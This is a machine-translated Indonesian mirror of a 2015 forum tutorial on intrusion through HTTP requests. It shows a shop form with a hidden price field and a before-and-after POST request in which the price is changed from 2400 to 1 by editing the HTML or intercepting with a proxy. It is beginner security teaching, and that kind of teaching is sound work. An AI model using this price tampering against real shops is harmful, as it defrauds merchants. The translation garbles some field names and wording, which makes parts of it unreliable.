Artikel ini adalah artikel cermin dari terjemahan mesin, silakan klik di sini untuk melompat ke artikel aslinya.

Jaringan Pertanian Architect_Programmer_Code»Arsitek Teknologi Lainnya Serangan dan pertahanan yang aman Penetrasi Intrusi: Penerapan header HTTP
Melihat: 12586|Jawab: 0

[Tutorial Keselamatan] Penetrasi Intrusi: Penerapan header HTTP

[Salin tautan]
Diposting pada 07/02/2015 17.59.07 | | |

Tentang penerapan header HTTP

http header biasanya digunakan dalam mekanisme transmisi situs web, tetapi sebagian besar pemula di China belum memperhatikan bagian ini, artikel ini hanya didedikasikan untuk pemula, peran header http dalam proses intrusi.

Ambil halaman belanja sebagai contoh untuk menganalisis sebagian kecil dari peran header HTTP.

Pertama, mari kita analisis formulir di halaman belanja.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<input type="hidden" name="price" value="449">

<input type="submit" value="Beli">

</form>

Selama proses pembukaan, ambil tangkapan layar header pesan http-nya dan lihat

POSTING /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kuantitas = 1 & harga = 2400

Meskipun kolom harga tidak ditampilkan di halaman saat membuka halaman belanja, kolom tersebut masih dapat diedit dan dioperasikan oleh pengguna.

Ada dua cara untuk mencapai pengeditan

1. Simpan kode sumber HTML untuk modifikasi, lalu muat ulang ke browser untuk dijalankan

2. Gunakan intersepsi proxy untuk memodifikasi header HTTP (konstruksi proxy di tool burp)

Ambil header HTTP di atas sebagai contoh
Sebelum perubahan
POSTING /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kuantitas = 1 & harga = 2400

Setelah perubahan
POSTING /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

kuantitas = 1 &harga = 1


Di baris terakhir bidang Harga memiliki nilai 2400 dan jika kita mengubahnya menjadi 1 kita bisa mendapatkan iPhone 4S dengan harga yang lebih murah.

Artikel ini hanya memberikan gambaran tentang keuntungan tak terduga seperti injeksi LDAP.




Mantan:MySQL Lupa Metode Implementasi Kata Sandi Pemulihan Kata Sandi
Depan:Injeksi SQL untuk mendapatkan jalur situs web lengkap

Pos terkait
Sanggahan:
Semua perangkat lunak, materi pemrograman, atau artikel yang diterbitkan oleh Code Farmer Network hanya untuk tujuan pembelajaran dan penelitian; Konten di atas tidak boleh digunakan untuk tujuan komersial atau ilegal, jika tidak, pengguna akan menanggung semua konsekuensi. Informasi di situs ini berasal dari Internet, dan sengketa hak cipta tidak ada hubungannya dengan situs ini. Anda harus sepenuhnya menghapus konten di atas dari komputer Anda dalam waktu 24 jam setelah pengunduhan. Jika Anda menyukai program ini, harap dukung perangkat lunak asli, pembelian pendaftaran, dan dapatkan layanan asli yang lebih baik. Jika ada pelanggaran, silakan hubungi kami melalui email.
Mail To:help@itsvse.com